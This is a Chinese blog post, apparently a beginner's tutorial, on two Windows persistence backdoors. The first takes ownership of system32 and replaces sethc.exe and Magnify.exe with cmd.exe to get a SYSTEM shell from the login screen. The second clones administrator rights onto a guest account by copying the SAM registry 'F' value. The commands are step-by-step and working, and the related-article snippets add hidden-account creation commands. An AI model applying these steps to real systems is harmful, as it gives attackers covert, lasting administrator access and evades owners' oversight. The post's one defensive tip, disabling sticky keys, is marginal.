内网渗透基础操作---轻松使用后门以及用户克隆

最新推荐文章于 2024-03-14 14:58:18 发布
最新推荐文章于 2024-03-14 14:58:18 发布
阅读量902 收藏 2
点赞数 1
分类专栏: 内网渗透 文章标签: 渗透测试 windows 7
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaotia_123/article/details/114538326
版权

“轻松使用”后门:

既然是后门,也就是说已经拿到管理员权限
环境:win7
原理:把sethc.exe覆盖成cmd.exe。
效果:连续按5次shift键或者win++呼出cmd。
命令
①更改文件所有者

takeown  /F  c:\windows\system32\* /A /R

*:所有文件
/F(file) :指定文件
/A :更改归管理员组所有
/R :递归
在这里插入图片描述
②更改文件权限

cacls c:\windows\system32\*  
/T /E /G administrators:F

因为不知道各个文件的依赖关系,就全部更改权限
/T :类似于递归
/E :编辑ACL不替换
/G :赋予指定用户访问权限:
----R :读取
----W :写入
----C :更改
----F :完全控制在这里插入图片描述
③覆盖
备份cmd

copy cmd.exe cmd.exe.bak

覆盖放大镜

copy cmd.exe Magnify.exe

覆盖粘滞键

copy cmd.exe sethc.exe

注销之后:系统不知道呼出的cmd以何种方式运行,就会默认以system方式运行
防范:所以我们在平常用不到粘滞键的话,最好是把它关闭了。
在这里插入图片描述
本人安全小白,还有很多不懂的地方,如果哪一步做错了,欢迎指点。

“用户克隆”后门:

作用
一般黑客在入侵一个系统就可以采用这个办法来为自己留一个后门。即通过注册表,把管理员简直赋予普通用户,让普通用户拥有管理员权限。

例如guest用户被克隆后当管理员查看guest的时候它还是属于guest组,如果是禁用状态,显示还是禁用状态,但这个时候guest登入到系统而且是管理员权限

命令
win+r->regedit 打开运行对话框,进入注册表
打开HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users目录
在这里插入图片描述
如果SAM文件下的SAM文件无法打开:
在这里插入图片描述
通过下面的高级添加你使用的用户,并且使得该用户具有完全控制的权限
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
选择需要赋予权限的用户
在这里插入图片描述

确定
在这里插入图片描述

勾选完全控制并确定即可
在这里插入图片描述
紧接着通过Name文件下的Administrator的类型比对,找到管理员的F值进行复制:
在这里插入图片描述

在这里插入图片描述
紧接着找到需要克隆的普通用户:
在这里插入图片描述
将管理员F值粘贴修改:
在这里插入图片描述

C:\WINDOWS\system32>net user zjx /active:yes 激活该用户
在这里插入图片描述
然后注销登录此用户
在这里插入图片描述
win+r打开运行对话框会出现:使用管理权限创建次任务。说明该用户已经继承了管理员权限并且会继承管理员的界面
在这里插入图片描述
后门创建成功。

本人安全小白,还有很多不懂的地方,如果哪一步做错了,欢迎指点。

小天要回去
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
内网权限维持 —— 后门
战神/calmness的博客
12-09 1076
目录 操作系统后门 粘滞键 注册表注入 计划任务 meterpreter Cymothoa WMI型 web 后门 Nishang 下的webshell weevely webacoo ASPX meterpreter PHP meterpreter 域控制器权限持久化 DSRM 域后门 SSP 维持域控权限 SID History 域后门 Golden Ticket Silver Ticket Skeleton Key Hook PasswordChangeNot
内网渗透克隆用户
qq_42383069的博客
12-27 2000
内网渗透(添加隐藏账户、克隆账户) 1. 普通添加用户 net user test 123456 /add net localgroup administrators test /add 2. 添加隐藏用户(注册表,D盾可查出)只是对 net user 隐藏了,开机登陆用户时会显示出隐藏用户名! net user test$ 123456 /add net localgroup administrators test$ /add 1)注册表中可查到 2)控制面板用户账户也能查到 3)计算机管理(右
后渗透利用sethc留下后门
whoim_i的博客
02-19 7192
目录说在前面什么是sethc?怎么利用?关于sethc的权限 说在前面 大家在平常使用电脑办公的时候,手不小心按到了键盘上的某个键,电脑上就会弹出一个框框,叫作是否启用粘滞键,这很影响我们的操作。然而这个东西却存在着巨大的漏洞。 什么是sethc?怎么利用? sethc就是windows中的粘滞键。他的启用方式是按5下shift键,windows就会去找c:\windows\system32\下面...
内网渗透----常见后门
浅笑996的博客
05-31 1226
0x01.综合利用手法 1.Smbrelay smbrelayx.py 由于此手法是中间件攻击,需要关闭SMB的签名措施,Windows Server默认开启,其他系统默认关闭,使用 nmap扫描一下未开启签名的机器: nmap -sT -p 445 --open --script smb-security-mode.nse,smb-os-discovery.nse 192.168.91.0/24...
Windows——利用"轻松访问"创建Windows后门
浅浅的博客
02-25 1483
实验环境:虚拟机Win7 概要:当我们每次开启电脑时,都会出现如下界面,点击下图左下角所示的图标——,就会出现 "轻松访问" 的对话框,勾选对话框上任意复选框,系统就会执行其相应的功能!注意,重点来了,这样是不是就意味着,只要我们将 'cmd' 应用程序重命名为 "轻松访问" 选项中任一程序(比如:朗读屏幕内容(讲述人),程序名为Narrator) 的名字,在我们勾选 "讲述人" 复选框并执行...
内网渗透综合实验 - 实验指导书
10-23
内网渗透综合实验 - 实验指导书,通过实验学习内网渗透的细节,掌握内网攻防的具体步骤,可以进行实战操作
内网渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
SCZF-ZD-004 内网网络及用户管理制度.pdf
04-11
【SCZF-ZD-004 内网网络及用户管理制度】是针对四川政法共建共享平台内部涉密网络和用户管理的重要规定,旨在确保涉密信息的安全,防止信息泄露,遵循严格的网络安全和保密原则。以下是该制度的关键要点: 1. **...
内网渗透测试-外链.pdf
05-04
内网渗透测试-外链.pdf
内网离线搭建之-kafka集群
12-25
内网离线搭建kafka集群是一项关键任务,特别是在网络受限的环境中。Kafka是一个高吞吐量、分布式的发布/订阅消息系统,常用于大数据实时流处理。在本教程中,我们将详细介绍如何在没有互联网连接的情况下搭建kafka...
网络克隆工具_计算机与网络安全技术杂谈篇【一】
weixin_39807067的博客
12-15 255
声明:本公众号【Kali与编程】所有分享,仅做学习交流,切勿用于任何不法用途,否则后果自负!一、Nessus是什么?Nessus是全球使用人数最多的系统漏洞扫描与分析软件,这是一个免费、威力强大、更新频繁并简易使用的远端系统安全扫描程序,功能十分强大。下载软件包的时候一定要找一个网速很好并且稳定的地方。1、官网下载https://www.tenable.com/downloads/nes...
linux 内网怎样留后门,内网渗透 day8-linux提权和后门植入
weixin_33821888的博客
05-15 431
linux提权和后门植入1. 脏牛漏洞复现(1) 去网页上把dirty.c中的代码复下来,制然后touch(创建)一个.c文件,vi或者vim打开将代码复制进去保存(不能在kali上直接wget下载https://github.com/FireFart/dirtycow/blob/master/dirty.c,因为这样会把整个网页下载下来(亲测))(2) 进入shell然后从kali开的apach...
后门植入使用
arctanx__的博客
04-13 191
后门
内网安全之后门入门实验
ailx10
05-30 228
说起后门,我读研的时候英语课的期末考试英文演讲,我选的题目就是backdoor后门,那个时候郭燕老师正好在教Linux内核后门模块,怀着巨大的兴趣,在知乎上注册了一个小号,提了一个巨傻宝的rootkit后门问题(如何识别自己电脑有没有rootkit?)。好啦,关于这场5分钟的英文演讲,成绩还好,擦线过了,中科大末尾10%强制挂科可不是闹着玩的。嘻嘻,我偷偷的看了好几眼,准备的关键词提要的草稿纸,太...
帐户克隆及其防范对策
testalllife的专栏
05-19 824
一、克隆帐户原理:我们的帐户在注册表里都有他相应的键值,具体在 "[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users "administrator 的 项为 "000001F4"下面有 2个二进制值 一个 是"F"一个是"V"。我一般克隆的都是 Guest用户,所以我就拿这个克隆这个用户做例子,克隆其他用户方法相同。Guest的项为 "00000
windows sethc漏洞 5次shift获取系统权限
weixin_46128614的博客
03-22 997
漏洞成因 在未登陆的情况下,可以按下五次shift键启动 sethc程序,同时系统可以在未登录的情况下用system权限打开一个记事本,用记事本打开文件夹,可以将sethc程序换成cmd,进而获取了system权限 复现过程 在win7的启动过程中断电 再次启动进入恢复界面 选择修复 在结果的中可以打开一个记事本 用记事本打开 C:\windows\system找到sethc重命名,然后把...
粘滞键利用总结
prettyX的博客
04-24 3431
粘滞键 Windows系统下,启用粘滞键的键盘快捷方式是按5次Shift键 方法一 将sethc.exe(粘滞键程序)替换成cmd.exe,这样在目标机登录页面连续按5下shift可调出cmd命令行 sethc路径:c:\windows\system32 这里有一个权限的问题需要注意,在Windows Vista版本之后的系统,当修改sethc.exe程序名字或将该程序剪切走时,会需要TrustedInstaller权限 TrustedInstaller权限,要高于Administrat
操作系统权限维持(一)之Windows系统-粘贴键后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-23 614
在获取服务器权限后,为了防止服务器管理员发现和修补漏洞而导致对服务器权限的丢失,测试人员往往需要采取一些手段来实现对目标服务器的持久化访问。权限持久化(权限维持)技术就是包括任何可以被测试人员用来在系统重启、更改用凭据或其他可能造成访问中断的情况发生时保持对系统的访问技术。Web入侵流程。
Windows粘滞键后门
最新发布
carmi的博客
03-14 765
此时假如该设备设置了这种粘滞键的话就可以通过调出cmd窗口(管理员状态)进行用户的创建,并将该用户归入到管理员组当中,就可以实现没有用户信息即可登入设备的操作——粘滞键后门。在C:/Windows/System32这个目录(系统进程的目录)下可找到粘滞键sethc这个应用程序(系统进程)。出现这种情况的原因是:由于刚刚已经将权限给到管理员,但管理员的权限始终未变化,所以还是不能修改文件名称(提高)。右键cmd属性打开发现Administrators这个组的成员根本没有对该文件的完全控制权限。
内网渗透--ICMP隧道
05-16
对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕过防火墙和其他网络安全设备的检测和过滤。 ICMP隧道的实现需要两个端点:一个客户端和一个服务器端。客户端将要传输的数据封装在ICMP数据包...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值